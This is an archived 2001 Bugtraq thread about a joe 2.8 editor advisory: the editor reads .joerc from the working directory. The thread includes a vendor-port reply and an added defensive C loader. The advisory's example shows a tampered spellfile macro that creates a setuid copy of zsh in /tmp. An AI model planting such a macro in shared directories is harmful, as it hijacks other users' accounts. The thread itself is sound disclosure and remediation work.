6152496 2001-02-28 15:13 +0100  /74 lines/  <advisories@WKIT.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-02-28  18:30  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: advisories@WKIT.COM
Recipient: Bugtraq (import) <15685>
Subject: Joe's Own Editor File Handling Error
------------------------------------------------------------
From: advisories@WKIT.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <OF61B9B540.D6BC1630-ONC1256A01.004D1564@wkit.se>

WKIT SECURITY AB
 www.wkit.com


TITLE:          Joe's Own Editor File Handling Error
ADVISORY ID:    WSIR-01/02-02
REFERENCE:      http://www.wkit.com/advisories
CVE:            GENERIC-MAP-NOMATCH
CREDIT:         Christer Öberg, Wkit Security AB
CONTACT:        advisories@wkit.com
CLASS:          File Handling Error
OBJECT:         joe(1) (exec)
VENDOR:         Josef H. Allen
STATUS:
REMOTE:         No
LOCAL:          Yes
VULNERABLE:     Joseph Allen joe 2.8

DATE
  CREATED:        26/02/2001
  LAST UPDATED:
  VENDOR CONTACT:
  RELEASE:        28/02/2001

VULNERABILITY DESCRIPTION
  joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
  /usr/local/lib/joerc in that order. Users could be tricked into executing
  commands if they open/edit a file with joe in a directory where other
  users can write.

CONDITIONS
  User using joe in a world/group writable directory.

EXAMPLE
  A user copies the default joerc file to a world writable directory and
  changes
  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
  >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
  to
  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
  >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod
  4755 /tmp/suid",rtn,retype
  Another user opens a file in that directory with joe and runs ispell with
  ^[l; the result is a suid shell in /tmp.

SOLUTION/VENDOR INFORMATION/WORKAROUND

DISCLAIMER
  The contents of this advisory may be distributed freely, provided that
  no fee is charged and proper credit is given. Wkit Security AB takes
  no credit for this discovery if someone else has published this
  information in the public domain before this advisory was released.
  The information herein is intended for educational purposes, not for
  malicious use. Wkit Security AB takes no responsibility whatsoever for
  the use of this information.

ABOUT
  Wkit Security AB is an independent data security company working with
  security-related services and products.

  Wkit Security AB
  Upperudsv. 4
  S-464 72 Håverud
  SWEDEN
  http://www.wkit.com
  e-mail: advisories@wkit.com

(C) 2001 WKIT SECURITY AB
(6152496) ------------------------------------------
Comment in text 6153779 by Brad <brad@COMSTYLE.COM>
6153779 2001-02-28 14:25 -0500  /46 lines/ Brad <brad@COMSTYLE.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-02-28  23:48  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: brad@COMSTYLE.COM
Recipient: Bugtraq (import) <15691>
Comment to text 6152496 by  <advisories@WKIT.COM>
Subject: Re: Joe's Own Editor File Handling Error
------------------------------------------------------------
From: Brad <brad@COMSTYLE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSO.4.33.0102281412380.1599-100000@ss5.comstyle.com>

After looking through the patches that OpenBSD/FreeBSD/NetBSD have for
their joe ports, it looks like joe is still vulnerable in the
FreeBSD/NetBSD ports trees, but not in the OpenBSD ports tree as of
Dec 22 1998.

revision 1.3
date: 1998/12/22 03:58:13;  author: form;  state: Exp;  lines: +74 -55
Do not use ./.xxxrc startup file.
Startup files order: ~/.xxxrc, /etc/joe/xxxrc, ${PREFIX}/lib/joe/xxxrc.

// Brad

brad@comstyle.com
brad@openbsd.org

>TITLE:          Joe's Own Editor File Handling Error
>ADVISORY ID:    WSIR-01/02-02
>REFERENCE:      http://www.wkit.com/advisories
>CVE:            GENERIC-MAP-NOMATCH
>CREDIT:         Christer Öberg, Wkit Security AB
>CONTACT:        advisories@wkit.com
>CLASS:          File Handling Error
>OBJECT:         joe(1) (exec)
>VENDOR:         Josef H. Allen
>STATUS:
>REMOTE:         No
>LOCAL:          Yes
>VULNERABLE:     Joseph Allen joe 2.8
>
>DATE
>  CREATED:        26/02/2001
>  LAST UPDATED:
>  VENDOR CONTACT:
>  RELEASE:        28/02/2001
>
>VULNERABILITY DESCRIPTION
>  joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
>  /usr/local/lib/joerc in that order. Users could be tricked into executing
>  commands if they open/edit a file with joe in a directory where other
>  users can write.
(6153779) --------------------------------(Rewrapped)
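
The startup-file order from the OpenBSD port change quoted above (no ./ entry), combined with an ownership and permission check on whichever file is opened, as an added C example that is not joe's or the port's own code. The function names and the acceptance policy (owner is the user or root, no group/world write bit) are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example, not joe's code. Return an fd only if path is a regular file
 * owned by uid or root and not group/world writable. fstat() checks the open
 * descriptor, so the file cannot be swapped between check and use; O_NOFOLLOW
 * refuses a symlink as the last path component. */
int open_trusted_rc(const char *path, uid_t uid)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        (st.st_uid != uid && st.st_uid != 0) ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Try home/.joerc, then the system-wide file. There is deliberately no
 * "./.joerc" candidate: the working directory may be writable by others. */
int open_joerc(const char *home, const char *sysrc, uid_t uid)
{
    char cand[PATH_MAX];
    int n, fd;

    if (home != NULL && home[0] == '/') {
        n = snprintf(cand, sizeof cand, "%s/.joerc", home);
        if (n > 0 && (size_t)n < sizeof cand &&
            (fd = open_trusted_rc(cand, uid)) >= 0)
            return fd;
    }
    return sysrc != NULL ? open_trusted_rc(sysrc, uid) : -1;
}

int main(void)
{
    int fd = open_joerc(getenv("HOME"), "/usr/local/lib/joerc", getuid());
    puts(fd >= 0 ? "trusted rc file opened" : "no trusted rc; using defaults");
    if (fd >= 0) close(fd);
    return 0;
}
```

Because a file replaced by another user in a writable directory would carry that user's uid, the owner check also covers the case where the directory, rather than the file, is the writable object.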